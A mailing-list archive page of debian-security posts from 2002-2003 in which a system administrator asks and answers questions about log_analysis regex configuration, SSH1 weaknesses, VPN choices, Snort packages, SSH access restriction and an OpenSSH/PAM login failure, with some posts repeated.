log_analysis configuration
Hi all, I have something I've been trying to do with quite some time--the joys of log parsing. I have installed log_analysis, and it seems to be the best tool to do the job. However, the man pages are very difficult to read, and there are not any clear examples of how to use this that I can find. Does anyone have any configurations that work well with log_analysis or have any tips on getting it to filter SSH, sudo, etc..? TIA, -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpmFmhGO2JRz.pgp Description: PGP signature
Re: Security on an old machine
Steve Meyer grabbed a keyboard and typed...
> I have an old 486 without a cdrom in it. If I pull the hard drive and
> stick it in another machine to perform the install will this work? And if
> it does work will it make the system any less secure?
Since it's Debian, you don't need to stick it in a separate machine.
Just get enough floppies and do the install over a network :)
The only way this would be insecure is if someone broke into the
machine you're installing from and you copied over bad files.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
pgpwGIWCRU8ts.pgp
Description: PGP signature
Re: log_analysis configuration
Hi Mathias,
Thanks that's helpful if I'm workign on ONE machine. The problem
is I can't get this working for our loghost which gets all the
files.
All I get is this:
Other hosts syslogging to us:
290374 host1.example.edu
283974 host2.example.edu
289307 host3.example.edu
And so on.. no matter what I put in the config file :(
-Anne
Mathias Palm grabbed a keyboard and typed...
> On Thu, Oct 10, 2002 at 09:15:12AM -0700, Anne Carasik wrote:
> > Hi Mathias,
>
> Hi Anne,
>
> I send this one to the list again, I hope this is ok.
>
> >
> > Actually, it is a good start. The developer sent me a tutorial,
> > and I'm going to help him work on it for the clueless folks like
> > me :)
> >
> > > config_version 0.38
> >
> > Good, we're using the same version (I'm not surprised since
> > Debian hasn't upgraded this yet).
> >
> > > add arr log_type_list=
> > > iptables
> > >
> > > add arr log_type_list=
> > > iptables
> >
> > Ok, what is "add arr log_type_list" and why do you have this twice?
> >
> This is just a name for the for a new type of log-files where all the
> definitions to follow apply.
>
> I am sure the doubling is by accident. As I said, I got a config
> somewhere else and rewrote it according to my needs.
>
> > > add arr iptables_filenames=
> > > iptables
> >
> > Ok, so that's the filename you're reading from, right?
> >
>
> It is the root of the logfiles the log_type "iptables" applies to.
> This rule actually reads iptables.0 ... or iptables.1.gz (when called
> with argument -a)
>
>
> You need to read about "perl regular expressions" (man perlre or heaps
> of other sources about regular expressions) to understand the following
> and write your own configs. I am no expert in regexps and am sure you
> could write better ones. Regexps being a powerful tool it is worthwile
> to learn about them, so you wont waste your time.
>
> > > set var iptables_date_pattern=^((?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oc
> > > t|Nov|Dec)+\s+\d{1,2})\s+\d+\:\d+\:\d+\s+
> >
>
> Translated this means:
>
> the brackets are just groupings
>
> - ^ Match the beginning of the line
> - ?: some switch I cant remember why I put it there
> - Jan|Feb|Mar... matches Jan or Feb or Mar or ...
> - + match at least one time
> - \s match a whitespace (space, tab or similiar)
> - \d{1,2} match one or two digits
> - \: match a : (: is a special character and needs to be escaped)
>
> hence it matches a string like
>
> Oct 9 17:34:27
>
> at the beginning of the line.
>
> >
> > Ok, quick question:
> >
> > What does +\s +\d do? I take it +d is an integer and +s is a string?
> >
>
> see the above
>
> > > set var iptables_date_format=%b %e
> >
> > Not sure what %b and %e give you.
>
> read man strftime. I am not sure what it really does.
>
> >
> > > logtype: iptables
> > > pattern: tungurahua kernel: CHAIN INPUT.*SRC=($ip_pat).*DST=($ip_pat).*PR
> > > OTO=(.*)
> >
> > I take *'s work like they do in the shell?
> >
>
> The . matches any character and the * matches the preceding
> character 0 or more times. I am not sure if the "preceding character" is
> the dot or the character replacing the dot.
>
> > > use_sprintf
> > > format: "%-3s packet from %-15s to %-15s" , $3, $1, $2
> >
> > I have simple "format:" sections like:
> > format: STMP from $1 to $2
> >
> > What does use_sprintf buy you?
>
> I actually dont know, I guess sprintf sounded just familiar (knowing C
> quite well), so I didn't search for anything else
>
>
> >
> > > pattern: tungurahua kernel: CHAIN OUTPUT.*SRC=($ip_pat).*DST=($ip_pat).*P
> > > ROTO=(.*)
> >
> > Do the periods (.) give you anything if they aren't escaped with a \?
> >
>
> see before.
>
>
> Alright, hope this answers some of your questions. Good luck and thanks
> for writing the tutorial. I'd be interested in it and would be glad if
> you could notify me where to find it.
>
> Mathias
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
pgpEfhiHJ3pKZ.pgp
Description: PGP signature
Re: port 113
Ports 135-139 (and I think 445) are Netbios ports. Port 113 is auth/identd. IMHO, it makes sense to not let these in through your firewall. -Anne jjj3 grabbed a keyboard and typed... > > Ok, but if the port is 137 is that a problem? > > jjj3 > > Andy Coates writes: > > > > Hi All, > > > > > > Logs in my firewall shows me incoming connections to port 113 of the > > > firewall!! What it means? > > > > Some service you or your computer is connecting to is checking your > > ident. Disable the identd daemon or comment out the entry in inetd.conf > > if you do it that way. > > > > Usually happens when you IRC, or some FTP sites check. Don't recall a > > vulnerability for it. > > > > Andy. > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgptlMvWE95wK.pgp Description: PGP signature
Removing stupid HTTP methods from Apache
Hi all, I'm running Apache on a Woody machine, and I can't figure out for the life of me how to disable certain insecure HTTP methods like PROPFIND and PUT. Can someone please help me out? I've been searching through the docs and google, and I'm hoping I just overlooked something obvious. TIA, -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpL5ibW0IS60.pgp Description: PGP signature
Re: SSH
Adrian 'Dagurashibanipal' von Bidder grabbed a keyboard and typed... > As I said, I was not closely following the story, but IIRC the SSH > Protocol version 1 has a principal design flaw that *can* *not* *be* > *fixed* without breaking the protocol. That is correct. I've had lng discussions with Tatu Ylonen on this when I was at SSH.com. > There were, of course, additional issues with implementations, but ssh1 > never really was secure, and never will be. I'm not making any statement > about the practical relevance of the attack here, nor do I know of any > successful break in using this weakness, so YMMV. Arcfour (RC4), the CRC32 attack, and the Secure RPC were problems addressed by later versions of OpenSSH and SSH1 releases. There are other problems too--and you're right--fixing them would break SSH1. Instead, SSH2 was written to address these issues from the ground up. From what I remember, one of the biggest problems in SSH1 is that it uses weak authentication for the packets. There are other problems too, and the VUs issued by CERT only cover a portion of the issues. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpk48wO8j0H9.pgp Description: PGP signature
Question about snort binaries..
Hi all, This may be a stupid question, but I'm going to ask anyway :) Debian 3.0 uses Snort 1.8.4beta1, and unstable uses 1.9.0. Is there a way to define that I only want to use the unstable packages just related to snort or do I have to change my entire distribution to unstable? Testing distribution has 1.8.7. The problem I have is the snort rules are updated for 1.9.0, but not for 1.8.4beta1 :( Also, if you look at snort-rules-default for the different releases, there is a BIG difference in sizes: 1.8.4 beta 1 58.1K 1.8.773.7k 1.9.0 rel 2 91.7 Any other suggestions or recommendations are also welcome. Thanks, -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpLKsXaq8D2A.pgp Description: PGP signature
Re: Question about snort binaries..
Noah L. Meyerhans grabbed a keyboard and typed... > On Thu, Jan 30, 2003 at 09:35:05AM -0800, Anne Carasik wrote: > > Is there a way to define that I only want to use the unstable > > packages just related to snort or do I have to change my entire > > distribution to unstable? Testing distribution has 1.8.7. > No. You would have to pull in all the dependencies from unstable as > well, so you'd get all sorts of fun stuff like libc upgraded. Yeah, I realized that, then I figured out what to do :) > It's possible that you could try 'apt-get -b source snort' and have the > right thing happen. But then again, depending on the package in > unstable, this might not be buildable on something else. Right. So, here's what I've been doing: edit /etc/apt/apt.conf to have the following: APT::Default-Release "testing"; (I'm using testing instead of stable). And, for the packages I want the latest release for, I've been doing this: apt-get -t unstable install snort apt-get -t unstable install ssh etc. So far, I haven't had any problems :) > > Any other suggestions or recommendations are also welcome. > Go to www.snort.org, get the tarball, and install it in /usr/local/. > That's what I've been doing. That would have been my next step if the above didn't work. > This was discussed at quite a bit of length a month or two ago. Check > the archives. I saw something on snort-current about keeping rules up to date, but I don't remember anything about the binaries. I'll go poke through the archives. Thanks for your help :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpnqGgMs3sIe.pgp Description: PGP signature
Re: VPN: SSH or IPSec???
A true VPN is something like IPSec. SSH and SSL only tunnel TCP-based traffic (at least that's what they are supposed to do). If you want a true VPN, do not use SSH or SSL. IPSec is a good choice, but there are other VPN apps around including CIPE, VTUN, and TINC. YMMV.. Check out "Building Linux VPNs" book by Kolesnikov and Hatch-- that would be your best best. I personally like IPSec because it's fairly standardized, but again YMMV :) -Anne Servicios Inform?ticos UGT Galicia grabbed a keyboard and typed... > > > I'm planning to set up a VPN. I started reading The VPN Howto, but I > come to a crossroad as early as soon as I read past chapter 2: > > Should I use SSH or IPSec to set up my VPN? > Which are the drawbacks and advantages of both? > > I would like to know what's your opinion about it so I can choose the > most suitable option for me. > > Thank you > -- > > == > Felipe Mart?nez Hermo > [EMAIL PROTECTED] > [EMAIL PROTECTED] > == > Servicios Inform?ticos > UGT Galicia > [EMAIL PROTECTED] > == > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpzCjfmDHiMk.pgp Description: PGP signature
Re: [despammed] Re: VPN: SSH or IPSec???
Ed McMan grabbed a keyboard and typed...
> The VPN howto shows how to use ssh to make a true VPN. It involves
> ppp, not ssh's port forwarding. Unfortunately, the howto is very
> dated, and it relies on a software package that is very difficult to
> find.
You do not want to do that. Tunnelling PPP over SSH gives you serious
performance hits you have can reduced with other VPN implementations.
Don't get me wrong--SSH is good for a lot of things--just a VPN is
not one of them. I use SSH every day, and even maintain the SSH FAQ
(okay, so it's out-of-date, but Steve and I are working on that), but
I digress..
Here is a link on why PPP over SSH is a bad idea:
http://sites.inka.de/sites/bigred/devel/tcp-tcp.html
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
pgpfjmtt3BDRW.pgp
Description: PGP signature
Re: configure ssh-access
Why not just limit the access through SSH public key? It sounds like that would accomplish what you're trying to do. -Anne [EMAIL PROTECTED] grabbed a keyboard and typed... > Hi! > > I want to make ssh-access possible only from a restricted > number of hosts - those that are named in /etc/hosts.allow. > Users who want to login have a DynDNS host-name that shall > be listed in hosts.allow to make it possible for users with > a dial-up internet connection, too. > > BUT: > The problem is that I can only login to the ssh-machine > when I enter the IP-address to the hosts.allow file. > Specifying the hosts DNS-name does not work! > > AND: > I'd prefer to specify the rules for loggin into the machine > in the sshd_config-file, not in hosts.allow/deny. > But the AllowHosts/DenyHosts-options that could be used in > /etc/sshd_config earlier seem to be not any > longer available at the SSH-version I'm using. > It's: openssh-3.4p1-80 on a SuSE 8.1 > > Has anybody ideas in this 2 problems? > > thx in advance, > Klaus > > > > -- > Klaus Siegesleitner - [EMAIL PROTECTED] > SysAdmin at CAME (Center of Applied Molecular Engineering) > University of Salzburg, Jakob-Haringerstrasse 5, A-5020 Salzburg > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpp9eUBMFMTt.pgp Description: PGP signature
Re: Probem with openssh and pam modules
Kill your sshd. Run it in debugging mode (it will not fork a process): # sshd -ddd Open another window, now run the client in verbose mode: $ ssh -vvv user@host Then email us the output. :) Otherwise, this is really difficult to troubleshoot. -Anne This one time, Alexis Sukrieh wrote: > You're right, it was set to yes but after putting it to 'no', the same > problem is still there... > > At 16:11 02/10/2002 +0200, you wrote: > >You need to turn off UsePrivilegeSeparation > >in your /etc/ssh/sshd_config file. > > > >"UsePrivilegeSeparation no" > > > > > Alexis Sukrieh (sukria), <[EMAIL PROTECTED]> > . homepage - [http://sukria.net] > . clef PGP - [http://sukria.net/print.php?c=privacy] > . mydynaweb - [http://www.mydynaweb.net] > __ > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg07142/pgp0.pgp Description: PGP signature
Re: Probem with openssh and pam modules
_request: try method password > debug1: PAM Password authentication accepted for user "sukria" > debug2: pam_acct_mgmt() = 0 > Accepted password for sukria from 127.0.0.1 port 32989 ssh2 > debug1: Entering interactive session for SSH2. > debug1: fd 3 setting O_NONBLOCK > debug1: fd 8 setting O_NONBLOCK > debug1: server_init_dispatch_20 > debug1: server_input_channel_open: ctype session rchan 0 win 65536 max 16384 > debug1: input_session_request > debug1: channel 0: new [server-session] > debug1: session_new: init > debug1: session_new: session 0 > debug1: session_open: channel 0 > debug1: session_open: session 0: link with channel 0 > debug1: server_input_channel_open: confirm session > debug1: server_input_channel_req: channel 0 request pty-req reply 0 > debug1: session_by_channel: session 0 channel 0 > debug1: session_input_channel_req: session 0 req pty-req > debug1: Allocating pty. > debug1: session_pty_req: session 0 alloc /dev/pts/3 > debug3: tty_parse_modes: SSH2 n_bytes 256 > debug3: tty_parse_modes: ospeed 9600 > debug3: tty_parse_modes: ispeed 9600 > debug3: tty_parse_modes: 1 3 > debug3: tty_parse_modes: 2 28 > debug3: tty_parse_modes: 3 127 > debug3: tty_parse_modes: 4 21 > debug3: tty_parse_modes: 5 4 > debug3: tty_parse_modes: 6 0 > debug3: tty_parse_modes: 7 0 > debug3: tty_parse_modes: 8 17 > debug3: tty_parse_modes: 9 19 > debug3: tty_parse_modes: 10 26 > debug3: tty_parse_modes: 12 18 > debug3: tty_parse_modes: 13 23 > debug3: tty_parse_modes: 14 22 > debug3: tty_parse_modes: 18 15 > debug3: tty_parse_modes: 30 0 > debug3: tty_parse_modes: 31 0 > debug3: tty_parse_modes: 32 0 > debug3: tty_parse_modes: 33 0 > debug3: tty_parse_modes: 34 0 > debug3: tty_parse_modes: 35 0 > debug3: tty_parse_modes: 36 1 > debug3: tty_parse_modes: 37 0 > debug3: tty_parse_modes: 38 1 > debug3: tty_parse_modes: 39 0 > debug3: tty_parse_modes: 40 0 > debug3: tty_parse_modes: 41 0 > debug3: tty_parse_modes: 50 1 > debug3: tty_parse_modes: 51 1 > debug3: tty_parse_modes: 52 0 > debug3: tty_parse_modes: 53 1 > debug3: tty_parse_modes: 54 1 > debug3: tty_parse_modes: 55 1 > debug3: tty_parse_modes: 56 0 > debug3: tty_parse_modes: 57 0 > debug3: tty_parse_modes: 58 0 > debug3: tty_parse_modes: 59 1 > debug3: tty_parse_modes: 60 1 > debug3: tty_parse_modes: 61 1 > debug3: tty_parse_modes: 62 0 > debug3: tty_parse_modes: 70 1 > debug3: tty_parse_modes: 71 0 > debug3: tty_parse_modes: 72 1 > debug3: tty_parse_modes: 73 0 > debug3: tty_parse_modes: 74 0 > debug3: tty_parse_modes: 75 0 > debug3: tty_parse_modes: 90 1 > debug3: tty_parse_modes: 91 1 > debug3: tty_parse_modes: 92 0 > debug3: tty_parse_modes: 93 0 > debug1: server_input_channel_req: channel 0 request shell reply 0 > debug1: session_by_channel: session 0 channel 0 > debug1: session_input_channel_req: session 0 req shell > debug1: PAM setting tty to "/dev/pts/3" > PAM session setup failed[28]: Module is unknown > debug1: Calling cleanup 0x805a3ec(0x80917a0) > debug1: session_pty_cleanup: session 0 release /dev/pts/3 > debug1: Calling cleanup 0x80604b8(0x0) > debug1: channel_free: channel 0: server-session, nchannels 1 > debug3: channel_free: status: The following connections are open: > #0 server-session (t10 r0 i0/0 o0/0 fd -1/-1) > > debug3: channel_close_fds: channel 0: r -1 w -1 e -1 > debug1: Calling cleanup 0x8052b48(0x0) > debug1: Calling cleanup 0x806be4c(0x0) > poseidon:~# > > > At 07:22 02/10/2002 -0700, Anne Carasik wrote: > >Kill your sshd. Run it in debugging mode (it will not > >fork a process): > > > ># sshd -ddd > > > >Open another window, now run the client in verbose mode: > > > >$ ssh -vvv user@host > > > >Then email us the output. :) Otherwise, this is really difficult > >to troubleshoot. > > > >-Anne > > > > > > > >This one time, Alexis Sukrieh wrote: > >> You're right, it was set to yes but after putting it to 'no', the same > >> problem is still there... > >> > >> At 16:11 02/10/2002 +0200, you wrote: > >> >You need to turn off UsePrivilegeSeparation > >> >in your /etc/ssh/sshd_config file. > >> > > >> >"UsePrivilegeSeparation no" > >> > >> > >> > >> > >> Alexis Sukrieh (sukria), <[EMAIL PROTECTED]> > >> . homepage - [http://sukria.net] > >> . clef PGP - [http://sukria.net/print.php?c=privacy] > >> . mydynaweb - [http://www.mydynaweb.net] > >> __ > >> > >> > >> -- > >> T
Re: Probem with openssh and pam modules
Hi Alexis, Did you setup /etc/pam.d/ssh? -Anne This one time, Alexis Sukrieh wrote: > Hehe :) > > yes, but before mailing here, I've supposed that there was a missing > packagedependance in unstable and I look for pam* stuff. > > I found those ones > > libpam-modules - Pluggable Authentication Modules for PAM > libpam0g - Pluggable Authentication Modules library > > and I installed it. > > I also installed > libpam-cracklib - PAM module to enable cracklib support. > > but nothing changed... > > I really don't see what to do ... > > At 07:41 02/10/2002 -0700, you wrote: > >Hi there, > > > >This might provide a clue: > > debug1: PAM setting tty to "/dev/pts/3" > > PAM session setup failed[28]: Module is unknown > > > >-Anne > > > > > Alexis Sukrieh (sukria), <[EMAIL PROTECTED]> > . homepage - [http://sukria.net] > . clef PGP - [http://sukria.net/print.php?c=privacy] > . mydynaweb - [http://www.mydynaweb.net] > __ > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg07147/pgp0.pgp Description: PGP signature
Re: Probem with openssh and pam modules
This one time, Alexis Sukrieh wrote: > Well, again it is not the solution for me ! > It is yet turned off Hmmm.. not sure. > is this a common problem ??? I'm surprised in the way that every > intelligent solutions you all provide to me are ineffectvie... Hmmm.. try apt-get remove --purge openssh and reinstall it after you get PAM working. > is the ssh package young in the unstable branch ? I haven't had any problems, but it is unstable after all ;) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg07151/pgp0.pgp Description: PGP signature
Re: Probem with openssh and pam modules
This one time, Lupe Christoph wrote: > Correct me if I'm wrong, but don't we expect people who run unstable to > diagnoseproblems themselves? If they can't they should be running stable > or at least testing? I think there's nothing wrong with helping someone out, no matter which group they're running. Why should it matter? Isn't this mailing list called debian-security? Not debian-security-stable. > Unstable is not just a name... Neither is testing nor stable :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg07172/pgp0.pgp Description: PGP signature
log_analysis configuration
Hi all, I have something I've been trying to do with quite some time--the joys of log parsing. I have installed log_analysis, and it seems to be the best tool to do the job. However, the man pages are very difficult to read, and there are not any clear examples of how to use this that I can find. Does anyone have any configurations that work well with log_analysis or have any tips on getting it to filter SSH, sudo, etc..? TIA, -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg07263/pgp0.pgp Description: PGP signature
Re: Security on an old machine
Steve Meyer grabbed a keyboard and typed...
> I have an old 486 without a cdrom in it. If I pull the hard drive and
> stick it in another machine to perform the install will this work? And if
> it does work will it make the system any less secure?
Since it's Debian, you don't need to stick it in a separate machine.
Just get enough floppies and do the install over a network :)
The only way this would be insecure is if someone broke into the
machine you're installing from and you copied over bad files.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
msg07393/pgp0.pgp
Description: PGP signature
Re: log_analysis configuration
Hi Mathias,
Thanks that's helpful if I'm workign on ONE machine. The problem
is I can't get this working for our loghost which gets all the
files.
All I get is this:
Other hosts syslogging to us:
290374 host1.example.edu
283974 host2.example.edu
289307 host3.example.edu
And so on.. no matter what I put in the config file :(
-Anne
Mathias Palm grabbed a keyboard and typed...
> On Thu, Oct 10, 2002 at 09:15:12AM -0700, Anne Carasik wrote:
> > Hi Mathias,
>
> Hi Anne,
>
> I send this one to the list again, I hope this is ok.
>
> >
> > Actually, it is a good start. The developer sent me a tutorial,
> > and I'm going to help him work on it for the clueless folks like
> > me :)
> >
> > > config_version 0.38
> >
> > Good, we're using the same version (I'm not surprised since
> > Debian hasn't upgraded this yet).
> >
> > > add arr log_type_list=
> > > iptables
> > >
> > > add arr log_type_list=
> > > iptables
> >
> > Ok, what is "add arr log_type_list" and why do you have this twice?
> >
> This is just a name for the for a new type of log-files where all the
> definitions to follow apply.
>
> I am sure the doubling is by accident. As I said, I got a config
> somewhere else and rewrote it according to my needs.
>
> > > add arr iptables_filenames=
> > > iptables
> >
> > Ok, so that's the filename you're reading from, right?
> >
>
> It is the root of the logfiles the log_type "iptables" applies to.
> This rule actually reads iptables.0 ... or iptables.1.gz (when called
> with argument -a)
>
>
> You need to read about "perl regular expressions" (man perlre or heaps
> of other sources about regular expressions) to understand the following
> and write your own configs. I am no expert in regexps and am sure you
> could write better ones. Regexps being a powerful tool it is worthwile
> to learn about them, so you wont waste your time.
>
> > > set var iptables_date_pattern=^((?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oc
> > > t|Nov|Dec)+\s+\d{1,2})\s+\d+\:\d+\:\d+\s+
> >
>
> Translated this means:
>
> the brackets are just groupings
>
> - ^ Match the beginning of the line
> - ?: some switch I cant remember why I put it there
> - Jan|Feb|Mar... matches Jan or Feb or Mar or ...
> - + match at least one time
> - \s match a whitespace (space, tab or similiar)
> - \d{1,2} match one or two digits
> - \: match a : (: is a special character and needs to be escaped)
>
> hence it matches a string like
>
> Oct 9 17:34:27
>
> at the beginning of the line.
>
> >
> > Ok, quick question:
> >
> > What does +\s +\d do? I take it +d is an integer and +s is a string?
> >
>
> see the above
>
> > > set var iptables_date_format=%b %e
> >
> > Not sure what %b and %e give you.
>
> read man strftime. I am not sure what it really does.
>
> >
> > > logtype: iptables
> > > pattern: tungurahua kernel: CHAIN INPUT.*SRC=($ip_pat).*DST=($ip_pat).*PR
> > > OTO=(.*)
> >
> > I take *'s work like they do in the shell?
> >
>
> The . matches any character and the * matches the preceding
> character 0 or more times. I am not sure if the "preceding character" is
> the dot or the character replacing the dot.
>
> > > use_sprintf
> > > format: "%-3s packet from %-15s to %-15s" , $3, $1, $2
> >
> > I have simple "format:" sections like:
> > format: STMP from $1 to $2
> >
> > What does use_sprintf buy you?
>
> I actually dont know, I guess sprintf sounded just familiar (knowing C
> quite well), so I didn't search for anything else
>
>
> >
> > > pattern: tungurahua kernel: CHAIN OUTPUT.*SRC=($ip_pat).*DST=($ip_pat).*P
> > > ROTO=(.*)
> >
> > Do the periods (.) give you anything if they aren't escaped with a \?
> >
>
> see before.
>
>
> Alright, hope this answers some of your questions. Good luck and thanks
> for writing the tutorial. I'd be interested in it and would be glad if
> you could notify me where to find it.
>
> Mathias
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
msg07399/pgp0.pgp
Description: PGP signature
Re: port 113
Ports 135-139 (and I think 445) are Netbios ports. Port 113 is auth/identd. IMHO, it makes sense to not let these in through your firewall. -Anne jjj3 grabbed a keyboard and typed... > > Ok, but if the port is 137 is that a problem? > > jjj3 > > Andy Coates writes: > > > > Hi All, > > > > > > Logs in my firewall shows me incoming connections to port 113 of the > > > firewall!! What it means? > > > > Some service you or your computer is connecting to is checking your > > ident. Disable the identd daemon or comment out the entry in inetd.conf > > if you do it that way. > > > > Usually happens when you IRC, or some FTP sites check. Don't recall a > > vulnerability for it. > > > > Andy. > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg07983/pgp0.pgp Description: PGP signature
Removing stupid HTTP methods from Apache
Hi all, I'm running Apache on a Woody machine, and I can't figure out for the life of me how to disable certain insecure HTTP methods like PROPFIND and PUT. Can someone please help me out? I've been searching through the docs and google, and I'm hoping I just overlooked something obvious. TIA, -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg08004/pgp0.pgp Description: PGP signature
Re: SSH
Adrian 'Dagurashibanipal' von Bidder grabbed a keyboard and typed... > As I said, I was not closely following the story, but IIRC the SSH > Protocol version 1 has a principal design flaw that *can* *not* *be* > *fixed* without breaking the protocol. That is correct. I've had lng discussions with Tatu Ylonen on this when I was at SSH.com. > There were, of course, additional issues with implementations, but ssh1 > never really was secure, and never will be. I'm not making any statement > about the practical relevance of the attack here, nor do I know of any > successful break in using this weakness, so YMMV. Arcfour (RC4), the CRC32 attack, and the Secure RPC were problems addressed by later versions of OpenSSH and SSH1 releases. There are other problems too--and you're right--fixing them would break SSH1. Instead, SSH2 was written to address these issues from the ground up. From what I remember, one of the biggest problems in SSH1 is that it uses weak authentication for the packets. There are other problems too, and the VUs issued by CERT only cover a portion of the issues. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg08253/pgp0.pgp Description: PGP signature
Question about snort binaries..
Hi all, This may be a stupid question, but I'm going to ask anyway :) Debian 3.0 uses Snort 1.8.4beta1, and unstable uses 1.9.0. Is there a way to define that I only want to use the unstable packages just related to snort or do I have to change my entire distribution to unstable? Testing distribution has 1.8.7. The problem I have is the snort rules are updated for 1.9.0, but not for 1.8.4beta1 :( Also, if you look at snort-rules-default for the different releases, there is a BIG difference in sizes: 1.8.4 beta 1 58.1K 1.8.773.7k 1.9.0 rel 2 91.7 Any other suggestions or recommendations are also welcome. Thanks, -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg08524/pgp0.pgp Description: PGP signature
Re: Question about snort binaries..
Noah L. Meyerhans grabbed a keyboard and typed... > On Thu, Jan 30, 2003 at 09:35:05AM -0800, Anne Carasik wrote: > > Is there a way to define that I only want to use the unstable > > packages just related to snort or do I have to change my entire > > distribution to unstable? Testing distribution has 1.8.7. > No. You would have to pull in all the dependencies from unstable as > well, so you'd get all sorts of fun stuff like libc upgraded. Yeah, I realized that, then I figured out what to do :) > It's possible that you could try 'apt-get -b source snort' and have the > right thing happen. But then again, depending on the package in > unstable, this might not be buildable on something else. Right. So, here's what I've been doing: edit /etc/apt/apt.conf to have the following: APT::Default-Release "testing"; (I'm using testing instead of stable). And, for the packages I want the latest release for, I've been doing this: apt-get -t unstable install snort apt-get -t unstable install ssh etc. So far, I haven't had any problems :) > > Any other suggestions or recommendations are also welcome. > Go to www.snort.org, get the tarball, and install it in /usr/local/. > That's what I've been doing. That would have been my next step if the above didn't work. > This was discussed at quite a bit of length a month or two ago. Check > the archives. I saw something on snort-current about keeping rules up to date, but I don't remember anything about the binaries. I'll go poke through the archives. Thanks for your help :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ msg08529/pgp0.pgp Description: PGP signature
Re: configure ssh-access
